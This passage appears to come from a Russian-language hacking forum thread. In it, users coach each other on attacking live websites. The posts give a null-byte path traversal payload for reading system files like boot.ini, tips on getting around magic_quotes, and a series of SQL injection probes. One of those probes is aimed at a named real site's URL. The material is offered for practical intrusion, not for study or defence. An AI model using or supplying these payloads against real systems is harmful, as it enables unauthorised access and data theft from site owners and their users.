2 4adr0s
нет, можешь подняться выше: ../../../../boot.ini%00
если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/

з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал

Неа... все жестко, и мир жесток...

Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так
Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание..http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание..
Запрос с заменой нул байта будем примерно таким
Где file.txt это любой файл в директории tmpl
ЧИТАЙ

Iceangel_
смотри репу)
меджик квотс обходятся

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Я тут пытался провести SQL-inj И у меня не получается, помогите плиз...
Ошибочка id=1'
Так тоже ошибка id=1'--
Потом востановил запрос id=1--
Затем попробовал попробовать id=1+and+1=1-- ошибки нет
id=1+and+1=2-- ошибки нет
И так тоже нет ошибки id=1+group+by+99--

как можно попробовать?

Мде ни текста ошибки,ни хрена...(
Урл вообще в идеале.....

Поставь "+" в конец запроса,может из за отсутсвия пробела дальнейший запрос не обрезаеться(Это лишь предположение,мож скули нет,вообще)

Byrger
если id=1+or+1=1-- и id=1+or+1=2-- разные тогда это скуля
если нет тогда пробуй id=1'+or+1=1-- id=1'+or+1=2--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1

Можно тут что-нибудь сделать?

http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--